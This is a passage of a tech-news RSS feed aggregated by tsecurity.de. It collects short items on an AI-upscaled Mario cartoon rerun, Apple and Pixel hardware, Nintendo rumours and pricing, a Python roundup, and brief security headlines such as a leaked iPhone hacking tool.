<content:encoded><![CDATA[<p>Adults of a certain age will no doubt remember <em>The Super Mario Bros. Super Show</em>, a cartoon from 1989 that starred our favorite sibling plumbers decades before they would take over multiplexes <a data-i13n="cpos:1;pos:1" href="https://www.engadget.com/the-super-mario-bros-movie-sets-box-office-records-as-the-highest-grossing-video-game-movie-100838234.html"><ins>with an animated film franchise</ins></a>. The broadcast channel MeTV Toons has begun <a data-i13n="cpos:2;pos:1" href="https://metvtoons.com/stories/the-super-mario-bros-super-show-is-coming-to-metv-toons"><ins>airing old episodes of the show</ins></a>, likely to trade on the buzz emanating from the <a data-i13n="cpos:3;pos:1" href="https://www.engadget.com/entertainment/tv-movies/heres-the-final-trailer-for-the-super-mario-galaxy-movie-181819593.html"><ins>pending theatrical release</ins></a> of <em>The Super Mario Galaxy Movie</em>. There's just one problem. The episodes <a data-i13n="elm:affiliate_link;sellerN:Facebook;elmt:;cpos:4;pos:1" href="https://shopping.yahoo.com/rdlw?merchantId=58a137b8-4748-4ad2-b1db-003c79a332f5&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=bcc818fb-f684-4c9b-af42-4aaa9fa7ff01&amp;featureId=text-link&amp;merchantName=Facebook&amp;linkText=seem+to+have+been+sloppified&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5mYWNlYm9vay5jb20vZ3JvdXBzLzE2MTM0Njc0NDAxNTE2OC9wb3N0cy8zNjM2MDQ2NDQ2NTQ1MTYzLyIsImNvbnRlbnRVdWlkIjoiYmNjODE4ZmItZjY4NC00YzliLWFmNDItNGFhYTlmYTdmZjAxIiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy5mYWNlYm9vay5jb20vZ3JvdXBzLzE2MTM0Njc0NDAxNTE2OC9wb3N0cy8zNjM2MDQ2NDQ2NTQ1MTYzLyJ9&amp;signature=AQAAAbleC91rMaWbQxRuOGE-C8Mn4Xg4yE3NB_h1Dt6P_jFs&amp;gcReferrer=https%3A%2F%2Fwww.facebook.com%2Fgroups%2F161346744015168%2Fposts%2F3636046446545163%2F" class="rapid-with-clickid" data-original-link="https://www.facebook.com/groups/161346744015168/posts/3636046446545163/">seem to have been sloppified</a> by AI, <a data-i13n="cpos:5;pos:1" href="https://kotaku.com/they-brought-back-the-super-mario-bros-cartoon-back-and-sloppified-it-with-ai-2000683558"><ins>according to a report by </ins><em><ins>Kotaku</ins></em></a>.</p>
<div><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The Super Mario Super Show has started airing on MEtv using some kind of AI upscaling ,and the results are as good as you'd expect <a href="https://t.co/WrdFbOe2iW">pic.twitter.com/WrdFbOe2iW</a></p>— Super Mario Wiki (@SMWikiOfficial) <a href="https://twitter.com/SMWikiOfficial/status/2038953129513725983?ref_src=twsrc%5Etfw">March 31, 2026</a></blockquote>
 

</div>
<p>The original series wasn't exactly a visual delight. It was a cash grab cartoon from the 1980s. However, it looks even worse now. MeTV seems to have run the footage through a bargain bin AI upscaler and the results are, in a word, weird.</p>
<span></span><p>Everything looks smoothed over in an off-putting way, with some characters looking markedly different from the original footage. Many of the episodes <a data-i13n="cpos:6;pos:1" href="https://www.youtube.com/watch?v=Q20ovbTOroE&amp;list=PLyUkLo8OvFU6pPVTZUHob6pP3FY-wUSlq"><ins>are available on YouTube</ins></a>, so it's easy to do your own comparisons.</p>

<p>The AI also seems to have <a data-i13n="cpos:7;pos:1" href="https://www.reddit.com/r/MeTVToons/comments/1s7oukl/comment/odc6cjx/">changed the title card to</a> "The Suele Mario Bros. Super Show." These AI tools have never been great with visual representations of written text, but you'd think someone at the station would have given things a look over. Engadget has reached out to MeTV to ask what happened and we'll update this post when we find out.</p>
<div></div>
<p>For the uninitiated, <em>The Super Mario Bros. Super Show</em> ran for just a single season. But this was 1989, so a full 65 episodes aired throughout the year. Seasons didn't mess around back then. It was famous for its live-action segments that starred professional wrestler "Captain" Lou Albano as Mario. It also turned into a Legend of Zelda cartoon every Friday. There's where the famous <a data-i13n="cpos:8;pos:1" href="https://tenor.com/search/excuse-me-princess-gifs"><ins>"well, excuse me princess" meme</ins></a> comes from.</p>This article originally appeared on Engadget at https://www.engadget.com/entertainment/tv-movies/the-super-mario-bros-cartoon-is-back-but-looks-really-weird-thanks-to-ai-171536332.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s the Pixel 11 Pro]]></title>
<description><![CDATA[The Google Pixel 11 Pro makes its first appearance and it looks like you think it does. Following yesterday’s release of the first Pixel 11 renders, we now have renders of the Pixel 11 Pro. Hey, guys, I bet we get the XL tomorrow and then the Fold the day after. Might as well run...
Read the orig...]]></description>
<link>https://tsecurity.de/de/3396473/it-nachrichten/heres-the-pixel-11-pro/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3396473/it-nachrichten/heres-the-pixel-11-pro/</guid>
<pubDate>Tue, 31 Mar 2026 16:46:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Google Pixel 11 Pro makes its first appearance and it looks like you think it does. Following yesterday’s release of the first Pixel 11 renders, we now have renders of the Pixel 11 Pro. Hey, guys, I bet we get the XL tomorrow and then the Fold the day after. Might as well run...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/03/31/heres-the-pixel-11-pro/">Here’s the Pixel 11 Pro</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s how to backup your Apple devices on World Backup Day]]></title>
<description><![CDATA[There’s a saying that there are two types of people in the world: those who have experienced major data loss and those who will experience major data loss. World Backup Day is a good time to ensure that you’re protected against falling into the second category.



Fortunately, Apple devices make ...]]></description>
<link>https://tsecurity.de/de/3395960/ios-mac-os/heres-how-to-backup-your-apple-devices-on-world-backup-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3395960/ios-mac-os/heres-how-to-backup-your-apple-devices-on-world-backup-day/</guid>
<pubDate>Tue, 31 Mar 2026 13:58:15 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/03/Heres-how-to-backup-your-Apple-devices.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p>There’s a saying that there are two types of people in the world: those who <em>have</em> experienced major data loss and those who <em>will</em> experience major data loss. <a href="https://www.worldbackupday.com/en" target="_blank" rel="noreferrer noopener">World Backup Day</a> is a good time to ensure that you’re protected against falling into the second category.</p>



<p>Fortunately, <a href="https://9to5mac.com/guides/aapl/" target="_blank" rel="noreferrer noopener">Apple</a> devices make it very simple to keep them automatically backed up, but it is still worrying how many people fail to do so …</p>



 <a data-layer-pagetype="post" data-layer-postcategory="ipad,iphone,mac" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1045950" href="https://9to5mac.com/2026/03/31/heres-how-to-backup-your-apple-devices-on-world-backup-day/#more-1045950" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s what I’d like to see with the MacBook Air redesign, after seeing MacBook Neo]]></title>
<description><![CDATA[Apple unveiled the MacBook Neo earlier this month, and in my opinion – it completely breaks the MacBook lineup as we knew it. If you’re someone who previously bought a MacBook Air, and you don’t need 16GB of RAM for heavier multitasking – why wouldn’t you buy the MacBook Neo now?



In my eyes, t...]]></description>
<link>https://tsecurity.de/de/3389505/ios-mac-os/heres-what-id-like-to-see-with-the-macbook-air-redesign-after-seeing-macbook-neo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3389505/ios-mac-os/heres-what-id-like-to-see-with-the-macbook-air-redesign-after-seeing-macbook-neo/</guid>
<pubDate>Sat, 28 Mar 2026 19:12:47 +0100</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2025/03/m4-macbook-air-sleeve.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p>Apple unveiled the MacBook Neo earlier this month, and in my opinion – it completely breaks the MacBook lineup as we knew it. If you’re someone who previously bought a MacBook Air, and you don’t need 16GB of RAM for heavier multitasking – why wouldn’t you buy the MacBook Neo now?</p>



<p>In my eyes, the MacBook Neo is just as good of a general purpose laptop as the MacBook Air was, and besides more RAM, a much faster processor (though still a thermally limited one), and a larger display, it doesn’t feel like MacBook Air has much going for it – at least for now. Here’s how I’d improve it.</p>



 <a data-layer-pagetype="post" data-layer-postcategory="mac,macbook-air,opinion" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1045515" href="https://9to5mac.com/2026/03/28/heres-what-id-like-to-see-with-redesigned-macbook-air-wishlist/#more-1045515" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Over 6.8 million serves to bot farms in my tar pit/honeypot in the past 55 days. Here is some more information:]]></title>
<description><![CDATA[I saw a different user on here posted about their honeypot trap for bots, so I decided to post about mine too.     submitted by    /u/Glade_Art   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3388030/linux-tipps/over-68-million-serves-to-bot-farms-in-my-tar-pithoneypot-in-the-past-55-days-here-is-some-more-information/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3388030/linux-tipps/over-68-million-serves-to-bot-farms-in-my-tar-pithoneypot-in-the-past-55-days-here-is-some-more-information/</guid>
<pubDate>Sat, 28 Mar 2026 03:04:10 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I saw a different user on here posted about their honeypot trap for bots, so I decided to post about mine too. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Glade_Art"> /u/Glade_Art </a> <br> <span><a href="https://gladeart.com/blog/the-bot-situation-on-the-internet-is-actually-worse-than-you-could-imagine-heres-why">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1s5mwdt/over_68_million_serves_to_bot_farms_in_my_tar/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Crunchyroll is now available as a channel in the Apple TV app]]></title>
<description><![CDATA[If you're still using Crunchyroll after its AI subtitle fiasco and subsequent price increase, there's a new way to watch. The anime streaming service is now available as a channel in the Apple TV app.That means you can subscribe and stream your favorite anime titles, all within Apple's video app....]]></description>
<link>https://tsecurity.de/de/3387461/it-nachrichten/crunchyroll-is-now-available-as-a-channel-in-the-apple-tv-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3387461/it-nachrichten/crunchyroll-is-now-available-as-a-channel-in-the-apple-tv-app/</guid>
<pubDate>Fri, 27 Mar 2026 19:31:40 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you're still using Crunchyroll after its AI subtitle fiasco and subsequent price increase, there's a new way to watch. The anime streaming service is now available as a channel in the Apple TV app.</p><p>That means you can subscribe and stream your favorite anime titles, all within Apple's video app. No need for the Crunchyroll app or a separate login. (Your Apple account handles your subscription using this method.) <em>9to5Mac</em> <a target="_blank" class="link" href="https://9to5mac.com/2026/03/27/apple-tv-app-just-added-crunchyroll-as-new-channel-heres-what-that-means/" data-i13n="cpos:1;pos:1">notes</a> that this is the first significant new <a target="_blank" class="link" href="https://www.engadget.com/2019-03-25-apple-tv-channels.html" data-i13n="cpos:2;pos:1">channel added to the TV app</a> in some time.</p><p>Crunchyroll starts at $10 per month, after the platform <a target="_blank" class="link" href="https://www.engadget.com/entertainment/streaming/crunchyroll-increases-prices-for-all-anime-streaming-plans-234231265.html" data-i13n="cpos:3;pos:1">raised all of its monthly subscription prices</a> by $2 earlier this year. That may be a hard sell for fans frustrated by the platform's direction.</p><p>Last year, months after the company president enthused about the potential for AI subtitles, fans <a target="_blank" class="link" href="https://www.engadget.com/entertainment/streaming/crunchyroll-blames-third-party-vendor-for-ai-subtitle-mess-145621606.html" data-i13n="cpos:4;pos:1">noticed something fishy</a>. The German subtitles for <em>Necronomico and the Cosmic Horror Show</em> included one that began with "ChatGPT said…" Crunchyroll pinned the blame on a third-party vendor and promised it would work to "rectify the error."</p>This article originally appeared on Engadget at https://www.engadget.com/entertainment/streaming/crunchyroll-is-now-available-as-a-channel-in-the-apple-tv-app-182500579.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[It looks like we're finally getting an Ocarina of Time remake]]></title>
<description><![CDATA[After years of rumors and countless fan-made Unreal Engine tech demos of varying quality, it sounds like we might finally be getting a ground-up remake of The Legend of Zelda: Ocarina of Time.
That’s according to Nintendo insider NatetheHate, who said in the latest edition of his podcast that a r...]]></description>
<link>https://tsecurity.de/de/3387377/it-nachrichten/it-looks-like-were-finally-getting-an-ocarina-of-time-remake/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3387377/it-nachrichten/it-looks-like-were-finally-getting-an-ocarina-of-time-remake/</guid>
<pubDate>Fri, 27 Mar 2026 19:01:32 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>After years of rumors and countless <a data-i13n="cpos:1;pos:1" href="https://www.engadget.com/ue5-project-reimagines-zelda-ocarina-of-time-in-the-style-of-studio-ghibli-173030994.html"><ins>fan-made</ins></a> Unreal Engine tech demos of varying quality, it sounds like we might finally be getting a ground-up remake of <em>The Legend of Zelda: Ocarina of Time</em>.</p>
<p>That’s according to Nintendo insider NatetheHate, who said in the latest edition of his <a data-i13n="cpos:2;pos:1" href="https://www.youtube.com/watch?v=CnuTGIq5JzI"><ins>podcast</ins></a> that a remake of the seminal Nintendo 64 game would be coming to Switch 2 in the second half of 2026. The reliable tipster said he doesn’t know whether Nintendo is making a 1:1 remake of the original 3D Zelda entry, or something "that’s a little more free to explore design choices," adding that he was initially reluctant to share the information he’d received in case we ended up getting little more than an HD remaster. But it sounds like this is a more ambitious undertaking than that.</p>
<span></span><p><em>Ocarina of Time </em>has of course been remastered before, with 2011’s <em>The Legend of Zelda: Ocarina of Time 3D </em>for the 3DS generally considered to be the best version of the game you can play today. The original 1998 game is also easily accessible via emulation through Nintendo Switch Online, but a modern remake for Switch 2 does make some sense.</p>
<p>For one, 2026 marks the series’ 40th anniversary, and if you asked every Zelda fan alive what their favorite entry is, you can bet that <em>OoT </em>would feature pretty high in the final rankings. We’re also getting that live-action Zelda <a data-i13n="cpos:3;pos:1" href="https://www.engadget.com/gaming/nintendo/the-legend-of-zelda-movie-hits-theaters-on-march-26-2027-150145662.html"><ins>movie</ins></a> next year, and Nintendo will no doubt want to make sure audiences have done their homework on the games that inspired it.</p>
<p>Of course, none of this is official, so have those grains of salt at the ready, but NatetheHate did also claim that anyone hoping for a new 3D Mario game to arrive in 2026 is going to be disappointed. That’s more likely to arrive in 2027. In better news, we’re apparently also getting a brand new "classic-style" Star Fox game this summer, which would mark the return of the spacefaring Fox McCloud after a decade spent in Nintendo’s unloved mascot closet.</p>
<p>This rumor seems logical after Nintendo’s surprise <a data-i13n="cpos:4;pos:1" href="https://x.com/supermariomovie/status/2037153866836504878"><ins>announcement</ins></a> that the anthropomorphic red fox is going to feature in <a data-i13n="cpos:5;pos:1" href="https://www.engadget.com/entertainment/tv-movies/heres-the-final-trailer-for-the-super-mario-galaxy-movie-181819593.html"><em><ins>The Super Mario Galaxy Movie</ins></em></a>, which arrives next week. He’s being voiced by <a data-i13n="cpos:6;pos:1" href="https://variety.com/2026/film/news/fox-mccloud-glen-powell-super-mario-galaxy-movie-1236700990/"><ins>Glen Powell</ins></a>, because of course he is.</p>
<p>NatetheHate’s information on all of the above has been corroborated by <a data-i13n="cpos:7;pos:1" href="https://www.videogameschronicle.com/news/sources-nintendo-is-planning-a-new-star-fox-and-a-major-zelda-remake-this-year-but-no-3d-mario/"><em><ins>VGC</ins></em></a>, which says it lines up with what it's heard from its own sources. And in the case of the <em>Ocarina of Time </em>remake, that recent <a data-i13n="cpos:8;pos:1" href="https://www.engadget.com/gaming/nintendo/the-latest-legend-of-zelda-lego-set-pays-tribute-to-ocarina-of-times-final-battle-172212137.html"><ins>Lego</ins></a> set suddenly makes a lot of sense.</p>
<p>If indeed we do get the remake of <em>Metacritic</em>’s <a data-i13n="cpos:9;pos:1" href="https://www.metacritic.com/browse/game/"><ins>highest-rated game</ins></a> of all time later this year, physical collectors could have a difficult choice to make, after Nintendo <a data-i13n="cpos:10;pos:1" href="https://www.engadget.com/gaming/nintendo/nintendo-to-start-charging-different-prices-for-first-party-digital-and-physical-games-184249374.html"><ins>announced</ins></a> that physical versions of first-party Switch 2 games are about to become more expensive than their digital counterparts. This adjusted pricing will come into effect when <em>Yoshi and the Mysterious Book </em><a data-i13n="cpos:11;pos:1" href="https://www.engadget.com/gaming/nintendo/yoshi-and-the-mysterious-book-will-be-released-for-switch-2-on-may-21-164753150.html"><ins>launches</ins></a> on May 21.</p>This article originally appeared on Engadget at https://www.engadget.com/gaming/nintendo/it-looks-like-were-finally-getting-an-ocarina-of-time-remake-175546356.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[On the pleasures and dangers of open source Python]]></title>
<description><![CDATA[Announced at JavaOne, Project Detroit proposes to break down the walls between Java, Python, and JavaScript. Also in this report: Better ways to instrument your code with Python’s new built-in sampling profiler, another run at using AI locally to rework a Python project, and the question on every...]]></description>
<link>https://tsecurity.de/de/3385863/ai-nachrichten/on-the-pleasures-and-dangers-of-open-source-python/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3385863/ai-nachrichten/on-the-pleasures-and-dangers-of-open-source-python/</guid>
<pubDate>Fri, 27 Mar 2026 10:32:56 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Announced at JavaOne, Project Detroit proposes to break down the walls between Java, Python, and JavaScript. Also in this report: Better ways to instrument your code with Python’s new built-in sampling profiler, another run at using AI locally to rework a Python project, and the question on everyone’s mind right now (surely): What does OpenAI <em>really</em> want with Astral?</p>



<h2 class="wp-block-heading">Top picks for Python readers on InfoWorld</h2>



<p><strong><a href="https://www.infoworld.com/article/4147837/openai-buys-python-tools-builder-astral.html">OpenAI buys Python tools builder Astral</a><br></strong>Astral, the maker of uv, ty, and pyx, has a new home under the OpenAI umbrella. Is OpenAI demonstrating its commitment to maintaining tooling in the AI space, or is the purchase more of a power move?</p>



<p><strong><a href="https://www.infoworld.com/article/4144487/i-ran-qwen3-5-locally-instead-of-claude-code-heres-what-happened.html">I ran Qwen3.5 locally instead of Claude Code. Here’s what happened</a><br></strong>Want to run an LLM on your own hardware for that at-home Claude Code or Copilot experience? You can, but it’ll be a bumpy ride. My takeaway? Maybe don’t let the AI run around unsupervised after dark.</p>



<p><strong><a href="https://www.infoworld.com/video/4085906/hands-on-with-the-new-sampling-profiler-in-python-3-15.html">Hands-on with the new sampling profiler in Python 3.15</a><br></strong>Among Python 3.15’s best new features is a sampling profiler. See how it works in this guide to using the profiler to instrument your code and find bottlenecks with minimal performance impact.</p>



<p><strong><a href="https://www.infoworld.com/article/4145953/project-detroit-bridging-java-python-javascript-moves-forward.html">Project Detroit, bridging Java, Python, JavaScript, moves forward</a><br></strong>The once-dead, now-revived Detroit project aims to allow Java’s Foreign Function and Memory API to talk seamlessly to other language runtimes. The vision? More powerful mixing and matching of languages across domains.</p>



<h2 class="wp-block-heading">More good reads and Python updates elsewhere</h2>



<p><strong><a href="https://fpgmaas.com/blog/collapse-of-mkdocs/">The slow collapse of MkDocs</a><br></strong>The strange, ongoing saga of how a developer meltdown took out one of the most popular documentation tools for Python—with no clear successor in sight.</p>



<p><strong><a href="https://pyrefly.org/blog/typing-conformance-comparison/">Comparing the typing spec conformance of Python type-checking tools</a><br></strong>How well do tools like Pyright, Pyrefly, Mypy, Ty, and others conform to Python’s own type annotation specs? The answers range, surprisingly, from “very closely” to “just barely.”</p>



<p><strong><a href="https://cemrehancavdar.com/2026/03/10/optimization-ladder/">The optimization ladder: All the ways to make Python faster</a><br></strong>From replacing the runtime to integrating modules written in C or Rust, here’s an end-to-end rundown of ways to speed up Python for tasks that urgently need performance.</p>



<p><strong><a href="https://shiftmag.dev/license-laundering-and-the-death-of-clean-room-8528/">License laundering and the death of ‘clean room’</a><br></strong>When someone rewrote a long-unmaintained Python library with an LLM, the original developer broke a decade-plus silence to object. What are the implications for open source?</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Millions of UK iPhone Users Will Need to Verify Their Age — Here’s Why]]></title>
<description><![CDATA[Apple’s latest iOS update adds some new features and fixes several bugs — but it also introduces mandatory age verification for users in the United Kingdom. The post Millions of UK iPhone Users Will Need to Verify Their Age —…
Read more →
The post Millions of UK iPhone Users Will Need to Verify T...]]></description>
<link>https://tsecurity.de/de/3384586/it-security-nachrichten/millions-of-uk-iphone-users-will-need-to-verify-their-age-heres-why/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3384586/it-security-nachrichten/millions-of-uk-iphone-users-will-need-to-verify-their-age-heres-why/</guid>
<pubDate>Thu, 26 Mar 2026 20:36:41 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple’s latest iOS update adds some new features and fixes several bugs — but it also introduces mandatory age verification for users in the United Kingdom. The post Millions of UK iPhone Users Will Need to Verify Their Age —…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/millions-of-uk-iphone-users-will-need-to-verify-their-age-heres-why/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/millions-of-uk-iphone-users-will-need-to-verify-their-age-heres-why/">Millions of UK iPhone Users Will Need to Verify Their Age — Here’s Why</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A major hacking tool has leaked online, putting millions of iPhones at risk. Here’s what you need to know.]]></title>
<description><![CDATA[Here’s what we know, and what you need to know, about Coruna and DarkSword, two advanced iPhone hacking tools discovered by security researchers. DarkSword has now leaked online. This article has been indexed from Security News | TechCrunch Read the…
Read more →
The post A major hacking tool has ...]]></description>
<link>https://tsecurity.de/de/3383860/it-security-nachrichten/a-major-hacking-tool-has-leaked-online-putting-millions-of-iphones-at-risk-heres-what-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3383860/it-security-nachrichten/a-major-hacking-tool-has-leaked-online-putting-millions-of-iphones-at-risk-heres-what-you-need-to-know/</guid>
<pubDate>Thu, 26 Mar 2026 16:37:14 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Here’s what we know, and what you need to know, about Coruna and DarkSword, two advanced iPhone hacking tools discovered by security researchers. DarkSword has now leaked online. This article has been indexed from Security News | TechCrunch Read the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/a-major-hacking-tool-has-leaked-online-putting-millions-of-iphones-at-risk-heres-what-you-need-to-know-2/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/a-major-hacking-tool-has-leaked-online-putting-millions-of-iphones-at-risk-heres-what-you-need-to-know-2/">A major hacking tool has leaked online, putting millions of iPhones at risk. Here’s what you need to know.</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A major hacking tool has leaked online, putting millions of iPhones at risk. Here’s what you need to know]]></title>
<description><![CDATA[Here’s what we know, and what you need to know, about Coruna and DarkSword, two advanced iPhone hacking tools discovered by security researchers. DarkSword has now leaked online. This article has been indexed from Security News | TechCrunch Read the…
Read more →
The post A major hacking tool has ...]]></description>
<link>https://tsecurity.de/de/3383629/it-security-nachrichten/a-major-hacking-tool-has-leaked-online-putting-millions-of-iphones-at-risk-heres-what-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3383629/it-security-nachrichten/a-major-hacking-tool-has-leaked-online-putting-millions-of-iphones-at-risk-heres-what-you-need-to-know/</guid>
<pubDate>Thu, 26 Mar 2026 15:36:31 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Here’s what we know, and what you need to know, about Coruna and DarkSword, two advanced iPhone hacking tools discovered by security researchers. DarkSword has now leaked online. This article has been indexed from Security News | TechCrunch Read the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/a-major-hacking-tool-has-leaked-online-putting-millions-of-iphones-at-risk-heres-what-you-need-to-know/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/a-major-hacking-tool-has-leaked-online-putting-millions-of-iphones-at-risk-heres-what-you-need-to-know/">A major hacking tool has leaked online, putting millions of iPhones at risk. Here’s what you need to know</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forza Horizon 6 PC Requirements Revealed: Here’s What You Need to Run the Game]]></title>
<description><![CDATA[If you plan to play Forza Horizon 6 on PC, Playground Games has now shared the full system requirements ahead of launch, and most players…
The post Forza Horizon 6 PC Requirements Revealed: Here’s What You Need to Run the Game appeared first on OnMSFT.]]></description>
<link>https://tsecurity.de/de/3382473/windows-tipps/forza-horizon-6-pc-requirements-revealed-heres-what-you-need-to-run-the-game/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3382473/windows-tipps/forza-horizon-6-pc-requirements-revealed-heres-what-you-need-to-run-the-game/</guid>
<pubDate>Thu, 26 Mar 2026 09:23:58 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you plan to play Forza Horizon 6 on PC, Playground Games has now shared the full system requirements ahead of launch, and most players…</p>
<p>The post <a href="https://onmsft.com/news/forza-horizon-6-pc-requirements-revealed-heres-what-you-need-to-run-the-game/">Forza Horizon 6 PC Requirements Revealed: Here’s What You Need to Run the Game</a> appeared first on <a href="https://onmsft.com/">OnMSFT</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub Copilot will train on your data by default, here’s how to stop it]]></title>
<description><![CDATA[Microsoft plans to change how GitHub Copilot uses your data, and this update directly affects how the tool learns from real users. The company will…
The post GitHub Copilot will train on your data by default, here’s how to stop it appeared first on OnMSFT.]]></description>
<link>https://tsecurity.de/de/3382471/windows-tipps/github-copilot-will-train-on-your-data-by-default-heres-how-to-stop-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3382471/windows-tipps/github-copilot-will-train-on-your-data-by-default-heres-how-to-stop-it/</guid>
<pubDate>Thu, 26 Mar 2026 09:23:55 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft plans to change how GitHub Copilot uses your data, and this update directly affects how the tool learns from real users. The company will…</p>
<p>The post <a href="https://onmsft.com/news/github-copilot-will-train-on-your-data-by-default-heres-how-to-stop-it/">GitHub Copilot will train on your data by default, here’s how to stop it</a> appeared first on <a href="https://onmsft.com/">OnMSFT</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nintendo to start charging different prices for first-party digital and physical games]]></title>
<description><![CDATA[Nintendo just announced it will soon start charging different prices for first-party Switch 2 games based on whether the content is digital or physical. This could actually be a good thing for those who like to download their games instead of heading to a brick-and-mortar store to pick up a copy,...]]></description>
<link>https://tsecurity.de/de/3381347/it-nachrichten/nintendo-to-start-charging-different-prices-for-first-party-digital-and-physical-games/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3381347/it-nachrichten/nintendo-to-start-charging-different-prices-for-first-party-digital-and-physical-games/</guid>
<pubDate>Wed, 25 Mar 2026 19:46:06 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Nintendo just announced it will soon start charging different prices for first-party Switch 2 games based on <a data-i13n="cpos:1;pos:1" href="https://www.nintendo.com/us/whatsnew/about-nintendo-switch-2-game-pricing/"><ins>whether the content is digital or physical</ins></a>. This could actually be a good thing for those who like to download their games instead of heading to a brick-and-mortar store to pick up a copy, as digital titles are getting a nice discount.</p>
<p>It starts with the release of <a data-i13n="cpos:2;pos:1" href="https://www.engadget.com/gaming/nintendo/yoshi-and-the-mysterious-book-will-be-released-for-switch-2-on-may-21-164753150.html"><em><ins>Yoshi and the Mysterious Book</ins></em><ins> on May 21</ins></a>, which will be $60 on the eShop but $70 at retail locations. Prior to this, most first-party games were $70 no matter how you bought them. I prefer downloading games, for convenience, and paid that much for both <a data-i13n="cpos:3;pos:1" href="https://www.engadget.com/gaming/nintendo/donkey-kong-bananza-review-nintendos-latest-3d-platformer-is-an-instant-classic-143048108.html"><em><ins>Donkey Kong Bananza</ins></em></a> and <a data-i13n="cpos:4;pos:1" href="https://www.engadget.com/gaming/nintendo/pokemon-pokopia-review-possibly-the-most-charming-pokemon-game-yet-183000812.html"><em><ins>Pokémon Pokopia</ins></em></a>.</p>
